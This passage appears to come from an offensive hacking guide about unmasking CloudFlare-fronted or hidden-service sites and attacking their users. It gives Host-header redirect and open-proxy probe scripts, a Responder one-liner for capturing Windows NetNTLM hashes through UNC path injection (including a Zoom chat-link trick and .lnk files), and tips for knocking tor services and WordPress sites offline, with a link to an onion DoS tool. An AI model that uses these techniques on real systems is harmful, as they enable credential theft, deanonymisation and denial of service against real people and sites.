You might recall from the vhost section that one reason scanning for a specific vhost is nearly impossible is the large number of sites that'll blindly redirect you to whatever is in your Host: header. That sort of behavior is very common, and occasionally it's an SSRF rather than just a 301/302 redirect. Unfortunately CloudFlare tends to strip extra http headers, so you'd need to test by hand what you can and can't slip through. Keep in mind CloudFlare gives 403 errors without a server version when it blocks your request, so it's easy to tell when it's interfering.
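A quick hand test for that blind-redirect behavior (sitename.com and doesnotexist.example are placeholders; if CloudFlare is in front of the hostname, try it against a suspected origin ip instead):
----- host-redirect-check.sh -----
#!/bin/bash
# If the response is a 301/302 with the bogus hostname reflected in the Location
# header, the server is blindly redirecting based on whatever Host you send.
curl -sk -D - -o /dev/null "https://sitename.com/" -H "Host: doesnotexist.example" \
  | grep -iE '^(HTTP|Location)'
-----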
Additionally, modern websites frequently have some sort of load balancing. For tor sites it's usually something like OnionBalance, which was made with security in mind, but for CloudFlare sites you can sometimes trick the load balancer with malicious HTTP headers as well. There are even a few HTTP fields that are only used by proxies and load balancers that are worth sticking your ip address into.
I was wondering if you could use HTTP Request Smuggling to fit some of these fields in - more research needed.
Check for an open proxy
Your target is extremely unlikely to be a proxy. These requests are how you interact with a HTTP proxy, but please note that there's a huge difference between proxies and reverse proxies. Look them up, but the TL;DR is a proxy takes you where you specify, and a reverse proxy invisibly fetches data from another site due to the webserver configuration. The latter are frequently necessary as building blocks in modern web applications.
Proxy check one (ends with two newlines):
-----
GET http://youraddress:80 HTTP/1.0
-----
Another proxy check:
-----
CONNECT youraddress:80 HTTP/1.0
-----
Apparently this should work just as well:
-----
GET http://youraddress:80 HTTP/1.1
Host: youraddress:80
-----
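One way to actually send those raw checks (sitename.com is a placeholder; for plain http on port 80 you can pipe into nc instead of openssl):
----- send-proxy-check.sh -----
#!/bin/bash
# Send the first proxy check over TLS and print whatever comes back.
printf 'GET http://youraddress:80/ HTTP/1.0\r\n\r\n' \
  | openssl s_client -quiet -connect sitename.com:443
-----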
- End User Attacks
I pretty much never try to attack end users because I know very little about windows. The non-fiction book "Kingpin" is worth reading; its real life protagonist used almost entirely client side attacks. There are a really large number of ways you can execute code via any non-cloud MS Office product, due to the design supporting a number of completely obsolete features. Excel and Word in particular still allow for complex scripting, and Excel still has the built in ability to execute other programs.
Additionally, some applications and document formats for Windows are prone to connecting outwards when a valid SMB URI is encountered, aka a Windows UNC (a UNC is any valid path on a windows computer - it can be "c:\win.ini" or it can be "\\attacker-lan\fakeshare\document.anyextension"). Since Windows will silently try to log into remote shares with the user's username and password hash, this type of attack also causes credentials to be sent to your server. You can collect them with metasploit or Responder.py (see the one-liner below).
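The listening side is a one-liner, assuming Responder is installed and eth0 is the interface the victim's traffic will reach:
-----
# Responder answers the inbound SMB connection and logs the NetNTLM challenge-response:
sudo responder -I eth0
-----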
An example of a UNC path injection exploit is a recent Zoom (video chat software) bug. If you put a link like \\1.2.3.4\madeupshare\foo.txt into chat it'd be turned into a clickable blue link, and anyone who clicked it would send both their ip address and their hashed credentials to you. Many UNC path injection vulnerabilities don't require user interaction at all. There's another really popular UNC trick involving .lnk files that doesn't require the target to click the file - they just need to view the folder the .lnk file is in.
While hacking end users with trojans can be an effective way of getting hard-to-get things like initial credentials and vpn information, it rarely goes unnoticed - people frequently remember the incident, and once you get noticed you're not just some faceless ip address on the internet. Also, since malware distribution techniques tend to be generic and require a few specific features, they're not hard to detect with antivirus. Exploiting Adobe Reader used to be a really popular way of performing end user attacks, but well over 90% of those exploits required javascript embedded in the PDF.
- DoS attacks
I usually don't DoS stuff, but the actual tor node that forwards to the hidden service is known to be a weak link, especially for people using older versions of tor. There was a lot of discussion on Dread around a year ago regarding ways of configuring tor to withstand the impact of trying to overload it with circuits, so if you're defending a site you might want to read up.
Lots of standard website software has easy to stress out urls, like wp-cron.php in Wordpress, or search features. A search is usually querying a database of some sort, which can easily get computationally expensive, especially if you're really hammering it with searches that return a lot of results.
Tool:
https://github.com/k4m4/onioff